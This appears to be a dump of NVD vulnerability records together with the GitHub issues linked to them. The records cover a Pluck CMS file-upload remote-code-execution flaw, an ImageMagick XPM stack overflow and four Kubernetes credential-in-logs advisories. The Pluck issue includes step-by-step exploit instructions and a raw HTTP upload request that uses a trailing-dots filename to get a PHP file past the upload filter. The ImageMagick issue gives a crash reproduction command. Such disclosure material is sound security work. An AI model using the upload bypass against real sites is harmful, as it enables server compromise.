[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*", "matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.11:*:*:*:*:*:*:*", "matchCriteriaId": "B5BD7966-27D7-48D5-8B6B-5A9A8BAB508A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/pluck-cms/pluck/issues/91
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files Proof step1: login -> pages -> manage files upload .htaccess file to turn files/.htaccess to .htaccess.txt ![图片](https://user-images.githubusercontent.com/48854942/71186014-6cec3380-22b7-11ea-9557-3e257ec201ae.png) step2: throw .htaccess.txt into trash ![图片](https://user-images.githubusercontent.com/48854942/71186198-c5bbcc00-22b7-11ea-9b45-563580be1fcf.png) step3: upload shell code ![图片](https://user-images.githubusercontent.com/48854942/71186336-03205980-22b8-11ea-9c50-ce5c86aa4509.png) ``` POST /pluck4711/admin.php?action=files HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------18467633426500 Content-Length: 339 Connection: close Referer: http://127.0.0.1/pluck4711/admin.php?action=files Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij Upgrade-Insecure-Requests: 1 -----------------------------18467633426500 Content-Disposition: form-data; name="filefile"; filename="pass07.php......" Content-Type: application/octet-stream <?php echo phpinfo();?> -----------------------------18467633426500 Content-Disposition: form-data; name="submit" Upload -----------------------------18467633426500-- ``` ![图片](https://user-images.githubusercontent.com/48854942/71186507-4ed30300-22b8-11ea-901f-c4b4e139151c.png) step4: view http://127.0.0.1/pluck4711/files/pass07.php ![图片](https://user-images.githubusercontent.com/48854942/71186548-5eeae280-22b8-11ea-8f13-dd8c4fb4bb61.png)
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files
https://api.github.com/repos/pluck-cms/pluck/issues/91/comments
10
2019-12-19T15:37:06Z
2020-01-08T06:45:09Z
https://github.com/pluck-cms/pluck/issues/91
540,390,005
91
CVE-2020-19667
2020-11-20T16:15:15.557
Stack-based buffer overflow and unconditional jump in ReadXPMImage in coders/xpm.c in ImageMagick 7.0.10-7.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1895" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/01/msg00010.html" }, { "source": "[email protected]", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.10-7:*:*:*:*:*:*:*", "matchCriteriaId": "A6D172B4-41A4-4E14-A094-EEBBAB83ECAF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1895
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [✅ ] I have written a descriptive issue title - [ ✅] I have verified that I am using the latest version of ImageMagick - [ ✅] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description There's a stack buffer overflow at /coders/xpm.c:232 in ReadXPMImage [poc](https://raw.githubusercontent.com/minghangshen/bug_poc/master/poc2/stack-buffer-over1) ### Steps to Reproduce run_cmd `magick convert ./afl-Ima/sync_dir/fuzzer2/crashes/id\:000000\,sig\:06\,src\:009314\,op\:havoc\,rep\:16 t.png` Here's ASAN log. ``` ==22728==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff34696d60 at pc 0x7fb49cb4a648 bp 0x7fff34694c80 sp 0x7fff34694c70 READ of size 1 at 0x7fff34696d60 thread T0 #0 0x7fb49cb4a647 in ParseXPMColor /home/afl-Ima/ImageMagick/coders/xpm.c:232 #1 0x7fb49cb3d610 in ReadXPMImage /home/afl-Ima/ImageMagick/coders/xpm.c:425 #2 0x7fb49beb03c9 in ReadImage /home/afl-Ima/ImageMagick/MagickCore/constitute.c:553 #3 0x7fb49beb4d46 in ReadImages /home/afl-Ima/ImageMagick/MagickCore/constitute.c:941 #4 0x7fb49b594ed2 in ConvertImageCommand /home/afl-Ima/ImageMagick/MagickWand/convert.c:606 #5 0x7fb49b6cd098 in MagickCommandGenesis /home/afl-Ima/ImageMagick/MagickWand/mogrify.c:186 #6 0x55be14ba8ec0 in MagickMain utilities/magick.c:149 #7 0x55be14ba9146 in main utilities/magick.c:180 #8 0x7fb49ae56b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55be14ba8939 in _start (/home/ImageMagick/utilities/.libs/magick+0x1939) Address 0x7fff34696d60 is located in stack of thread T0 at offset 8352 in frame #0 0x7fb49cb3adef in ReadXPMImage /home/afl-Ima/ImageMagick/coders/xpm.c:250 This frame has 7 object(s): [32, 4128) 'key:251' [4256, 8352) 'target:251' <== Memory access at offset 8352 overflows this variable [8480, 8488) 'colors:286' [8512, 8520) 'columns:286' [8544, 8552) 'rows:286' [8576, 8584) 'width:286' [8608, 12704) 'symbolic:398' HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/afl-Ima/ImageMagick/coders/xpm.c:232 in ParseXPMColor Shadow bytes around the buggy address: 0x1000668cad50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000668cad60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000668cad70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000668cad80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000668cad90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x1000668cada0: 00 00 00 00 00 00 00 00 00 00 00 00[f2]f2 f2 f2 0x1000668cadb0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 f2 f2 f2 0x1000668cadc0: 00 f2 f2 f2 00 f2 f2 f2 00 f2 f2 f2 00 00 00 00 0x1000668cadd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000668cade0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000668cadf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==22728==ABORTING ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.10-7 Q16 x86_64 2020-04-10 https://imagemagick.org Copyright: © 1999-2020 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(3.1) Delegates (built-in): zlib - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS - Additional information: ``` root@VM-0-15-ubuntu:/home# ./ImageMagick/utilities/.libs/magick identify -list policy Path: /usr/local/etc/ImageMagick-7/policy.xml Policy: Resource name: list-length value: 128 Policy: Resource name: file value: 768 Policy: Resource name: disk value: 16EiB Policy: Resource name: map value: 4GiB Policy: Resource name: area value: 100MP Policy: Resource name: height value: 10KP Policy: Resource name: width value: 10KP Path: [built-in] Policy: Undefined rights: None ``` edit by peanuts , and Is it possible to request a cve id? <!-- Thanks for reporting the issue to ImageMagick! -->
stack-buffer-overflow at /coders/xpm.c:232 in ReadXPMImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1895/comments
9
2020-04-14T10:46:31Z
2020-11-30T07:10:48Z
https://github.com/ImageMagick/ImageMagick/issues/1895
599,474,018
1,895
CVE-2020-8563
2020-12-07T22:15:21.197
In Kubernetes clusters using VSphere as a cloud provider, with a logging level set to 4 or above, VSphere cloud credentials will be leaked in the cloud controller manager's log. This affects < v1.19.3.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/95621" }, { "source": "[email protected]", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210122-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "515661A5-8AFF-45B7-932C-3B5CD32945F0", "versionEndExcluding": "1.19.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/95621
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: 5.6 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N (Medium) In Kubernetes clusters using VSphere as a cloud provider, with a logging level set to 4 or above, VSphere cloud credentials will be leaked in the cloud controller manager's log. ### Am I vulnerable? If you are using VSphere as a cloud provider, have verbose logging enabled, and an attacker can access cluster logs, then you may be vulnerable to this. #### Affected Versions kube-controller-manager v1.19.0 - v1.19.2 #### How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to cluster logs. #### Fixed Versions v1.19.3 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek0405) /area security /kind bug /committee product-security
CVE-2020-8563: Secret leaks in kube-controller-manager when using vSphere provider
https://api.github.com/repos/kubernetes/kubernetes/issues/95621/comments
3
2020-10-15T22:00:44Z
2021-12-02T22:54:17Z
https://github.com/kubernetes/kubernetes/issues/95621
722,704,051
95,621
CVE-2020-8564
2020-12-07T22:15:21.307
In Kubernetes clusters using a logging level of at least 4, processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. This affects < v1.19.3, < v1.18.10, < v1.17.13.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/95622" }, { "source": "[email protected]", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210122-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "B765012B-C658-4EB8-956A-62A91142CE05", "versionEndExcluding": "1.17.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "67F84BBA-5FCA-4A23-BB4E-47BE92E3706A", "versionEndExcluding": "1.18.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "456BD01B-44E8-4823-B220-5E109D8C377D", "versionEndExcluding": "1.19.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.19.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/95622
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: 4.7 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N (Medium) In Kubernetes clusters using a logging level of at least 4, processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. ### Am I vulnerable? If kubernetes.io/dockerconfigjson type secrets are used, and a log level of 4 or higher is used. Third party tools using k8s.io/kubernetes/pkg/credentialprovider to read docker config files may also be vulnerable. #### Affected Versions kubernetes v1.19.0 - v1.19.2 kubernetes v1.18.0 - v1.18.9 kubernetes v1.17.0 - v1.17.12 ### How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. #### Fixed Versions v1.19.3 v1.18.10 v1.17.13 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Nikolaos Moraitis (Red Hat) /area security /kind bug /committee product-security
CVE-2020-8564: Docker config secrets leaked when file is malformed and log level >= 4
https://api.github.com/repos/kubernetes/kubernetes/issues/95622/comments
3
2020-10-15T22:03:19Z
2021-12-02T22:54:10Z
https://github.com/kubernetes/kubernetes/issues/95622
722,705,294
95,622
CVE-2020-8565
2020-12-07T22:15:21.400
In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects <= v1.19.3, <= v1.18.10, <= v1.17.13, < v1.20.0-alpha2.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/95623" }, { "source": "[email protected]", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "BAC4DF80-12A5-482D-88C8-1939A015FBE4", "versionEndExcluding": null, "versionEndIncluding": "1.17.13", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "57F3AFC9-8D1D-4870-B40E-5A2CFEB2388E", "versionEndExcluding": null, "versionEndIncluding": "1.18.10", "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "13CE6526-CD5D-4B0D-AE8C-20E113F2D412", "versionEndExcluding": null, "versionEndIncluding": "1.19.3", "versionStartExcluding": null, "versionStartIncluding": "1.19.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/95623
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: 4.7 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N (Medium) In Kubernetes, if the logging level is to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like `kubectl`. ### Am I vulnerable? If kube-apiserver is using a log level of at least 9. #### Affected Versions kubernetes v1.19.0 - v1.19.5 kubernetes v1.18.0 - v1.18.13 kubernetes v1.17.0 - v1.17.15 ### How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. #### Fixed Versions kubernetes v1.20.0 kubernetes v1.19.6 kubernetes v1.18.14 kubernetes v1.17.16 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Acknowledgements This vulnerability was reported by: Patrick Rhomberg (purelyapplied) /area security /kind bug /committee product-security
CVE-2020-8565: Incomplete fix for CVE-2019-11250 allows for token leak in logs when logLevel >= 9
https://api.github.com/repos/kubernetes/kubernetes/issues/95623/comments
3
2020-10-15T22:05:32Z
2021-12-02T22:54:04Z
https://github.com/kubernetes/kubernetes/issues/95623
722,706,304
95,623
CVE-2020-8566
2020-12-07T22:15:21.480
In Kubernetes clusters using Ceph RBD as a storage provisioner, with logging level of at least 4, Ceph RBD admin secrets can be written to logs. This occurs in kube-controller-manager's logs during provisioning of Ceph RBD persistent claims. This affects < v1.19.3, < v1.18.10, < v1.17.13.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/95624" }, { "source": "[email protected]", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20210122-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "B765012B-C658-4EB8-956A-62A91142CE05", "versionEndExcluding": "1.17.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "67F84BBA-5FCA-4A23-BB4E-47BE92E3706A", "versionEndExcluding": "1.18.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "456BD01B-44E8-4823-B220-5E109D8C377D", "versionEndExcluding": "1.19.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.19.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/95624
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: 4.7 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N (Medium) In Kubernetes clusters using Ceph RBD as a storage provisioner, with logging level of at least 4, Ceph RBD admin secrets can be written to logs. This occurs in kube-controller-manager's logs during provisioning of Ceph RBD persistent claims. ### Am I vulnerable? If Ceph RBD volumes are in use and kube-controller-manager is using a log level of at least 4. #### Affected Versions kubernetes v1.19.0 - v1.19.2 kubernetes v1.18.0 - v1.18.9 kubernetes v1.17.0 - v1.17.12 ### How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to logs. #### Fixed Versions v1.19.3 v1.18.10 v1.17.13 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek0405) /area security /kind bug /committee product-security
CVE-2020-8566: Ceph RBD adminSecrets exposed in logs when loglevel >= 4
https://api.github.com/repos/kubernetes/kubernetes/issues/95624/comments
3
2020-10-15T22:07:53Z
2021-12-02T22:53:56Z
https://github.com/kubernetes/kubernetes/issues/95624
722,707,368
95,624